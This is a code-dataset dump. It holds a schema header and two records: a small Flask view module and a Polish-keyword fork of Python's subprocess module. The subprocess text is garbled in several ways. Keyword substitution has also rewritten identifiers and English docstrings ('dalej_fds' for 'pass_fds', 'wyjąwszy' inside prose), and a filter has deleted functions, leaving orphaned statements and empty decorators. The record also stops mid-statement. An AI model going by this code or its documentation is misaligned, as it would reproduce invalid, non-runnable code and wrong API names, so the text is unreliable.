hexsha
stringlengths
40
40
size
int64
7
1.04M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
247
max_stars_repo_name
stringlengths
4
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
247
max_issues_repo_name
stringlengths
4
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
247
max_forks_repo_name
stringlengths
4
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.04M
avg_line_length
float64
1.77
618k
max_line_length
int64
1
1.02M
alphanum_fraction
float64
0
1
original_content
stringlengths
7
1.04M
filtered:remove_function_no_docstring
int64
-102
942k
filtered:remove_class_no_docstring
int64
-354
977k
filtered:remove_delete_markers
int64
0
60.1k
7489a928ee4ce01e0514e27f5339bfa54dd0436b
745
py
Python
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
2
2018-01-14T22:43:43.000Z
2018-01-14T22:43:48.000Z
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
null
null
null
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
null
null
null
from flask import jsonify
24.833333
94
0.660403
from flask import jsonify def register_group(http_status_code, group, message): view = jsonify({'status_code': http_status_code, 'message': message, 'group': group.data}) return view def get_groups(groups, total, pages, http_status_code): view = jsonify({'groups': groups.data, 'total': total, 'pages': pages, 'status_code': http_status_code}) return view def get_group_by_id(http_status_code, group): view = jsonify({'status_code': http_status_code, 'group': group.data}) return view def delete_group(http_status_code, group, message): view = jsonify({'status_code': http_status_code, 'message': message, 'group': group.data}) return view
623
0
92
1f752fceba17b43584813efd37c1d1e243571d98
69,340
py
Python
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
1
2018-06-21T18:21:24.000Z
2018-06-21T18:21:24.000Z
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
null
null
null
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
null
null
null
# subprocess - Subprocesses przy accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license dla licensing details. r"""subprocess - Subprocesses przy accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, oraz obtain their zwróć codes. This module intends to replace several older modules oraz functions: os.system os.spawn* Information about how the subprocess module can be used to replace these modules oraz functions can be found below. Using the subprocess module =========================== This module defines one klasa called Popen: klasa Popen(args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=Prawda, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): Arguments are: args should be a string, albo a sequence of program arguments. The program to execute jest normally the first item w the args sequence albo string, but can be explicitly set by using the executable argument. On POSIX, przy shell=Nieprawda (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated jako a sequence przy the string as the only item (the program to execute). On POSIX, przy shell=Prawda: If args jest a string, it specifies the command string to execute through the shell. If args jest a sequence, the first item specifies the command string, oraz any additional items will be treated jako additional shell arguments. On Windows: the Popen klasa uses CreateProcess() to execute the child program, which operates on strings. If args jest a sequence, it will be converted to a string using the list2cmdline method. 
Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline jest designed dla applications using the same rules jako the MS C runtime. bufsize will be supplied jako the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call oraz can zwróć short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout oraz stderr specify the executed programs' standard input, standard output oraz standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, oraz Nic. PIPE indicates that a new pipe to the child should be created. With Nic, no redirection will occur; the child's file handles will be inherited z the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data z the applications should be captured into the same file handle jako dla stdout. On POSIX, jeżeli preexec_fn jest set to a callable object, this object will be called w the child process just before the child jest executed. The use of preexec_fn jest nie thread safe, using it w the presence of threads could lead to a deadlock w the child process before the new executable is executed. If close_fds jest true, all file descriptors wyjąwszy 0, 1 oraz 2 will be closed before the child process jest executed. The default dla close_fds varies by platform: Always true on POSIX. Prawda when stdin/stdout/stderr are Nic on Windows, false otherwise. pass_fds jest an optional sequence of file descriptors to keep open between the parent oraz child. Providing any dalej_fds implicitly sets close_fds to true. jeżeli shell jest true, the specified command will be executed through the shell. 
If cwd jest nie Nic, the current directory will be changed to cwd before the child jest executed. On POSIX, jeżeli restore_signals jest Prawda all signals that Python sets to SIG_IGN are restored to SIG_DFL w the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ oraz SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, jeżeli start_new_session jest Prawda, the setsid() system call will be made in the child process prior to executing the command. If env jest nie Nic, it defines the environment variables dla the new process. If universal_newlines jest Nieprawda, the file objects stdin, stdout oraz stderr are opened jako binary files, oraz no line ending conversion jest done. If universal_newlines jest Prawda, the file objects stdout oraz stderr are opened jako a text file, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention albo '\r\n', the Windows convention. All of these external representations are seen jako '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin oraz stderr are nie updated by the communicate() method. In either case, the process being communicated przy should start up expecting to receive bytes on its standard input oraz decode them with the same encoding they are sent in. The startupinfo oraz creationflags, jeżeli given, will be dalejed to the underlying CreateProcess() function. They can specify things such as appearance of the main window oraz priority dla the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete. 
If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') getoutput(cmd): Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument. If universal_newlines jest set to Prawda, the "input" argument must be a string rather than bytes, oraz the zwróć value will be a string. 
Exceptions ---------- Exceptions podnieśd w the child process, before the new program has started to execute, will be re-raised w the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which jest a string containing traceback information z the child's point of view. The most common exception podnieśd jest OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare dla OSErrors. A ValueError will be podnieśd jeżeli Popen jest called przy invalid arguments. Exceptions defined within this module inherit z SubprocessError. check_call() oraz check_output() will podnieś CalledProcessError jeżeli the called process returns a non-zero zwróć code. TimeoutExpired be podnieśd jeżeli a timeout was specified oraz expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be dalejed to child processes. Popen objects ============= Instances of the Popen klasa have the following methods: poll() Check jeżeli child process has terminated. Returns returncode attribute. wait() Wait dla child process to terminate. Returns returncode attribute. communicate(input=Nic) Interact przy process: Send data to stdin. Read data z stdout oraz stderr, until end-of-file jest reached. Wait dla process to terminate. The optional input argument should be data to be sent to the child process, albo Nic, jeżeli no data should be sent to the child. If the Popen instance was constructed przy universal_newlines set to Prawda, the input argument should be a string oraz will be encoded using the preferred system encoding (see locale.getpreferredencoding); jeżeli universal_newlines jest Nieprawda, the input argument should be a byte string. communicate() returns a tuple (stdout, stderr). 
Note: The data read jest buffered w memory, so do nie use this method jeżeli the data size jest large albo unlimited. The following attributes are also available: stdin If the stdin argument jest PIPE, this attribute jest a file object that provides input to the child process. Otherwise, it jest Nic. stdout If the stdout argument jest PIPE, this attribute jest a file object that provides output z the child process. Otherwise, it jest Nic. stderr If the stderr argument jest PIPE, this attribute jest file object that provides error output z the child process. Otherwise, it jest Nic. pid The process ID of the child process. returncode The child zwróć code. A Nic value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions przy the subprocess module ==================================================== In this section, "a ==> b" means that b can be used jako a replacement dla a. Note: All functions w this section fail (more albo less) silently if the executed program cannot be found; this module podnieśs an OSError exception. In the following examples, we assume that the subprocess module jest imported przy "z subprocess zaimportuj *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=Prawda) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell jest usually nie required. * It's easier to look at the returncode attribute than the exitstatus. 
A more real-world example would look like this: spróbuj: retcode = call("mycmd" + " myarg", shell=Prawda) jeżeli retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) inaczej: print("Child returned", retcode, file=sys.stderr) wyjąwszy OSError jako e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ zaimportuj sys _mswindows = (sys.platform == "win32") zaimportuj io zaimportuj os zaimportuj time zaimportuj signal zaimportuj builtins zaimportuj warnings zaimportuj errno z time zaimportuj monotonic jako _time # Exception classes used by this module. klasa SubprocessError(Exception): dalej klasa CalledProcessError(SubprocessError): """This exception jest podnieśd when a process run by check_call() albo check_output() returns a non-zero exit status. The exit status will be stored w the returncode attribute; check_output() will also store the output w the output attribute. """ @property def stdout(self): """Alias dla output attribute, to match stderr""" zwróć self.output @stdout.setter klasa TimeoutExpired(SubprocessError): """This exception jest podnieśd when the timeout expires dopóki waiting dla a child process. 
""" @property @stdout.setter jeżeli _mswindows: zaimportuj threading zaimportuj msvcrt zaimportuj _winapi klasa STARTUPINFO: dwFlags = 0 hStdInput = Nic hStdOutput = Nic hStdError = Nic wShowWindow = 0 inaczej: zaimportuj _posixsubprocess zaimportuj select zaimportuj selectors spróbuj: zaimportuj threading wyjąwszy ImportError: zaimportuj dummy_threading jako threading # When select albo poll has indicated that the file jest writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF jako >= 512. _PIPE_BUF = getattr(select, 'PIPE_BUF', 512) # poll/select have the advantage of nie requiring any extra file # descriptor, contrarily to epoll/kqueue (also, they require a single # syscall). jeżeli hasattr(selectors, 'PollSelector'): _PopenSelector = selectors.PollSelector inaczej: _PopenSelector = selectors.SelectSelector __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "run", "CalledProcessError", "DEVNULL", "SubprocessError", "TimeoutExpired", "CompletedProcess"] # NOTE: We intentionally exclude list2cmdline jako it jest # considered an internal implementation detail. issue10838. jeżeli _mswindows: z _winapi zaimportuj (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) klasa Handle(int): closed = Nieprawda __del__ = Close __str__ = __repr__ # This lists holds Popen instances dla which the underlying process had nie # exited at the time its __del__ method got called: those processes are wait()ed # dla synchronously z _cleanup() when a new Popen object jest created, to avoid # zombie processes. 
_active = [] PIPE = -1 STDOUT = -2 DEVNULL = -3 # XXX This function jest only used by multiprocessing oraz the test suite, # but it's here so that it can be imported when Python jest compiled without # threads. args.append('-' + opt * v) dla opt w sys.warnoptions: args.append('-W' + opt) zwróć args def call(*popenargs, timeout=Nic, **kwargs): """Run command przy arguments. Wait dla command to complete albo timeout, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: retcode = call(["ls", "-l"]) """ przy Popen(*popenargs, **kwargs) jako p: spróbuj: zwróć p.wait(timeout=timeout) wyjąwszy: p.kill() p.wait() podnieś def check_call(*popenargs, **kwargs): """Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the call function. Example: check_call(["ls", "-l"]) """ retcode = call(*popenargs, **kwargs) jeżeli retcode: cmd = kwargs.get("args") jeżeli cmd jest Nic: cmd = popenargs[0] podnieś CalledProcessError(retcode, cmd) zwróć 0 def check_output(*popenargs, timeout=Nic, **kwargs): r"""Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> check_output(["ls", "-l", "/dev/null"]) b'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n' The stdout argument jest nie allowed jako it jest used internally. To capture standard error w the result, use stderr=STDOUT. >>> check_output(["/bin/sh", "-c", ... "ls -l non_existent_file ; exit 0"], ... 
stderr=STDOUT) b'ls: non_existent_file: No such file albo directory\n' There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it too will be used internally. Example: >>> check_output(["sed", "-e", "s/foo/bar/"], ... input=b"when w the course of fooman events\n") b'when w the course of barman events\n' If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz the zwróć value will be a string rather than bytes. """ jeżeli 'stdout' w kwargs: podnieś ValueError('stdout argument nie allowed, it will be overridden.') jeżeli 'input' w kwargs oraz kwargs['input'] jest Nic: # Explicitly dalejing input=Nic was previously equivalent to dalejing an # empty string. That jest maintained here dla backwards compatibility. kwargs['input'] = '' jeżeli kwargs.get('universal_newlines', Nieprawda) inaczej b'' zwróć run(*popenargs, stdout=PIPE, timeout=timeout, check=Prawda, **kwargs).stdout klasa CompletedProcess(object): """A process that has finished running. This jest returned by run(). Attributes: args: The list albo str args dalejed to run(). returncode: The exit code of the process, negative dla signals. stdout: The standard output (Nic jeżeli nie captured). stderr: The standard error (Nic jeżeli nie captured). """ def check_returncode(self): """Raise CalledProcessError jeżeli the exit code jest non-zero.""" jeżeli self.returncode: podnieś CalledProcessError(self.returncode, self.args, self.stdout, self.stderr) def run(*popenargs, input=Nic, timeout=Nic, check=Nieprawda, **kwargs): """Run command przy arguments oraz zwróć a CompletedProcess instance. The returned instance will have attributes args, returncode, stdout oraz stderr. By default, stdout oraz stderr are nie captured, oraz those attributes will be Nic. Pass stdout=PIPE and/or stderr=PIPE w order to capture them. 
If check jest Prawda oraz the exit code was non-zero, it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute, oraz output & stderr attributes jeżeli those streams were captured. If timeout jest given, oraz the process takes too long, a TimeoutExpired exception will be podnieśd. There jest an optional argument "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it will be used internally. The other arguments are the same jako dla the Popen constructor. If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz stdout/stderr w the returned object will be strings rather than bytes. """ jeżeli input jest nie Nic: jeżeli 'stdin' w kwargs: podnieś ValueError('stdin oraz input arguments may nie both be used.') kwargs['stdin'] = PIPE przy Popen(*popenargs, **kwargs) jako process: spróbuj: stdout, stderr = process.communicate(input, timeout=timeout) wyjąwszy TimeoutExpired: process.kill() stdout, stderr = process.communicate() podnieś TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr) wyjąwszy: process.kill() process.wait() podnieś retcode = process.poll() jeżeli check oraz retcode: podnieś CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) zwróć CompletedProcess(process.args, retcode, stdout, stderr) def list2cmdline(seq): """ Translate a sequence of arguments into a command line string, using the same rules jako the MS C runtime: 1) Arguments are delimited by white space, which jest either a space albo a tab. 2) A string surrounded by double quotation marks jest interpreted jako a single argument, regardless of white space contained within. A quoted string can be embedded w an argument. 3) A double quotation mark preceded by a backslash jest interpreted jako a literal double quotation mark. 
4) Backslashes are interpreted literally, unless they immediately precede a double quotation mark. 5) If backslashes immediately precede a double quotation mark, every pair of backslashes jest interpreted jako a literal backslash. If the number of backslashes jest odd, the last backslash escapes the next double quotation mark as described w rule 3. """ # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # albo search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = Nieprawda dla arg w seq: bs_buf = [] # Add a space to separate this argument z the others jeżeli result: result.append(' ') needquote = (" " w arg) albo ("\t" w arg) albo nie arg jeżeli needquote: result.append('"') dla c w arg: jeżeli c == '\\': # Don't know jeżeli we need to double yet. bs_buf.append(c) albo_inaczej c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') inaczej: # Normal char jeżeli bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, jeżeli any. jeżeli bs_buf: result.extend(bs_buf) jeżeli needquote: result.extend(bs_buf) result.append('"') zwróć ''.join(result) # Various tools dla executing commands oraz looking at their output oraz status. # zwróć status, data def getoutput(cmd): """Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. 
Example: >>> zaimportuj subprocess >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' """ zwróć getstatusoutput(cmd)[1] _PLATFORM_DEFAULT_CLOSE_FDS = object() klasa Popen(object): _child_created = Nieprawda # Set here since __del__ checks it jeżeli _mswindows: jeżeli preexec_fn jest nie Nic: podnieś ValueError("preexec_fn jest nie supported on Windows " "platforms") any_stdio_set = (stdin jest nie Nic albo stdout jest nie Nic albo stderr jest nie Nic) jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: jeżeli any_stdio_set: close_fds = Nieprawda inaczej: close_fds = Prawda albo_inaczej close_fds oraz any_stdio_set: podnieś ValueError( "close_fds jest nie supported on Windows platforms" " jeżeli you redirect stdin/stdout/stderr") inaczej: # POSIX jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: close_fds = Prawda jeżeli dalej_fds oraz nie close_fds: warnings.warn("pass_fds overriding close_fds.", RuntimeWarning) close_fds = Prawda jeżeli startupinfo jest nie Nic: podnieś ValueError("startupinfo jest only supported on Windows " "platforms") jeżeli creationflags != 0: podnieś ValueError("creationflags jest only supported on Windows " "platforms") self.args = args self.stdin = Nic self.stdout = Nic self.stderr = Nic self.pid = Nic self.returncode = Nic self.universal_newlines = universal_newlines # Input oraz output objects. The general principle jest like # this: # # Parent Child # ------ ----- # p2cwrite ---stdin---> p2cread # c2pread <--stdout--- c2pwrite # errread <--stderr--- errwrite # # On POSIX, the child objects are file descriptors. On # Windows, these are Windows file handles. The parent objects # are file descriptors on both platforms. The parent objects # are -1 when nie using PIPEs. The child objects are -1 # when nie redirecting. 
(p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) = self._get_handles(stdin, stdout, stderr) # We wrap OS handles *before* launching the child, otherwise a # quickly terminating child could make our fds unwrappable # (see #8458). jeżeli _mswindows: jeżeli p2cwrite != -1: p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0) jeżeli c2pread != -1: c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0) jeżeli errread != -1: errread = msvcrt.open_osfhandle(errread.Detach(), 0) jeżeli p2cwrite != -1: self.stdin = io.open(p2cwrite, 'wb', bufsize) jeżeli universal_newlines: self.stdin = io.TextIOWrapper(self.stdin, write_through=Prawda, line_buffering=(bufsize == 1)) jeżeli c2pread != -1: self.stdout = io.open(c2pread, 'rb', bufsize) jeżeli universal_newlines: self.stdout = io.TextIOWrapper(self.stdout) jeżeli errread != -1: self.stderr = io.open(errread, 'rb', bufsize) jeżeli universal_newlines: self.stderr = io.TextIOWrapper(self.stderr) self._closed_child_pipe_fds = Nieprawda spróbuj: self._execute_child(args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session) wyjąwszy: # Cleanup jeżeli the child failed starting. dla f w filter(Nic, (self.stdin, self.stdout, self.stderr)): spróbuj: f.close() wyjąwszy OSError: dalej # Ignore EBADF albo other errors. 
jeżeli nie self._closed_child_pipe_fds: to_close = [] jeżeli stdin == PIPE: to_close.append(p2cread) jeżeli stdout == PIPE: to_close.append(c2pwrite) jeżeli stderr == PIPE: to_close.append(errwrite) jeżeli hasattr(self, '_devnull'): to_close.append(self._devnull) dla fd w to_close: spróbuj: os.close(fd) wyjąwszy OSError: dalej podnieś zwróć self._devnull def _stdin_write(self, input): jeżeli input: spróbuj: self.stdin.write(input) wyjąwszy BrokenPipeError: # communicate() must ignore broken pipe error dalej wyjąwszy OSError jako e: jeżeli e.errno == errno.EINVAL oraz self.poll() jest nie Nic: # Issue #19612: On Windows, stdin.write() fails przy EINVAL # jeżeli the process already exited before the write dalej inaczej: podnieś self.stdin.close() def communicate(self, input=Nic, timeout=Nic): """Interact przy process: Send data to stdin. Read data from stdout oraz stderr, until end-of-file jest reached. Wait for process to terminate. The optional "input" argument should be data to be sent to the child process (jeżeli self.universal_newlines jest Prawda, this should be a string; jeżeli it jest Nieprawda, "input" should be bytes), albo Nic, jeżeli no data should be sent to the child. communicate() returns a tuple (stdout, stderr). These will be bytes or, jeżeli self.universal_newlines was Prawda, a string. """ jeżeli self._communication_started oraz input: podnieś ValueError("Cannot send input after starting communication") # Optimization: If we are nie worried about timeouts, we haven't # started communicating, oraz we have one albo zero pipes, using select() # albo threads jest unnecessary. 
jeżeli (timeout jest Nic oraz nie self._communication_started oraz [self.stdin, self.stdout, self.stderr].count(Nic) >= 2): stdout = Nic stderr = Nic jeżeli self.stdin: self._stdin_write(input) albo_inaczej self.stdout: stdout = self.stdout.read() self.stdout.close() albo_inaczej self.stderr: stderr = self.stderr.read() self.stderr.close() self.wait() inaczej: jeżeli timeout jest nie Nic: endtime = _time() + timeout inaczej: endtime = Nic spróbuj: stdout, stderr = self._communicate(input, endtime, timeout) w_końcu: self._communication_started = Prawda sts = self.wait(timeout=self._remaining_time(endtime)) zwróć (stdout, stderr) def poll(self): zwróć self._internal_poll() def _remaining_time(self, endtime): """Convenience dla _communicate when computing timeouts.""" jeżeli endtime jest Nic: zwróć Nic inaczej: zwróć endtime - _time() def _check_timeout(self, endtime, orig_timeout): """Convenience dla checking jeżeli a timeout has expired.""" jeżeli endtime jest Nic: zwróć jeżeli _time() > endtime: podnieś TimeoutExpired(self.args, orig_timeout) jeżeli _mswindows: # # Windows methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ jeżeli stdin jest Nic oraz stdout jest Nic oraz stderr jest Nic: zwróć (-1, -1, -1, -1, -1, -1) p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE) jeżeli p2cread jest Nic: p2cread, _ = _winapi.CreatePipe(Nic, 0) p2cread = Handle(p2cread) _winapi.CloseHandle(_) albo_inaczej stdin == PIPE: p2cread, p2cwrite = _winapi.CreatePipe(Nic, 0) p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite) albo_inaczej stdin == DEVNULL: p2cread = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdin, int): p2cread = msvcrt.get_osfhandle(stdin) inaczej: # Assuming file-like object p2cread = msvcrt.get_osfhandle(stdin.fileno()) 
p2cread = self._make_inheritable(p2cread) jeżeli stdout jest Nic: c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE) jeżeli c2pwrite jest Nic: _, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pwrite = Handle(c2pwrite) _winapi.CloseHandle(_) albo_inaczej stdout == PIPE: c2pread, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite) albo_inaczej stdout == DEVNULL: c2pwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdout, int): c2pwrite = msvcrt.get_osfhandle(stdout) inaczej: # Assuming file-like object c2pwrite = msvcrt.get_osfhandle(stdout.fileno()) c2pwrite = self._make_inheritable(c2pwrite) jeżeli stderr jest Nic: errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE) jeżeli errwrite jest Nic: _, errwrite = _winapi.CreatePipe(Nic, 0) errwrite = Handle(errwrite) _winapi.CloseHandle(_) albo_inaczej stderr == PIPE: errread, errwrite = _winapi.CreatePipe(Nic, 0) errread, errwrite = Handle(errread), Handle(errwrite) albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stderr, int): errwrite = msvcrt.get_osfhandle(stderr) inaczej: # Assuming file-like object errwrite = msvcrt.get_osfhandle(stderr.fileno()) errwrite = self._make_inheritable(errwrite) zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _make_inheritable(self, handle): """Return a duplicate of handle, which jest inheritable""" h = _winapi.DuplicateHandle( _winapi.GetCurrentProcess(), handle, _winapi.GetCurrentProcess(), 0, 1, _winapi.DUPLICATE_SAME_ACCESS) zwróć Handle(h) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, unused_restore_signals, unused_start_new_session): """Execute program (MS Windows version)""" assert nie dalej_fds, "pass_fds nie supported on Windows." 
jeżeli nie isinstance(args, str): args = list2cmdline(args) # Process startup details jeżeli startupinfo jest Nic: startupinfo = STARTUPINFO() jeżeli -1 nie w (p2cread, c2pwrite, errwrite): startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES startupinfo.hStdInput = p2cread startupinfo.hStdOutput = c2pwrite startupinfo.hStdError = errwrite jeżeli shell: startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW startupinfo.wShowWindow = _winapi.SW_HIDE comspec = os.environ.get("COMSPEC", "cmd.exe") args = '{} /c "{}"'.format (comspec, args) # Start the process spróbuj: hp, ht, pid, tid = _winapi.CreateProcess(executable, args, # no special security Nic, Nic, int(nie close_fds), creationflags, env, cwd, startupinfo) w_końcu: # Child jest launched. Close the parent's copy of those pipe # handles that only the child should have open. You need # to make sure that no handles to the write end of the # output pipe are maintained w this process albo inaczej the # pipe will nie close when the child process exits oraz the # ReadFile will hang. jeżeli p2cread != -1: p2cread.Close() jeżeli c2pwrite != -1: c2pwrite.Close() jeżeli 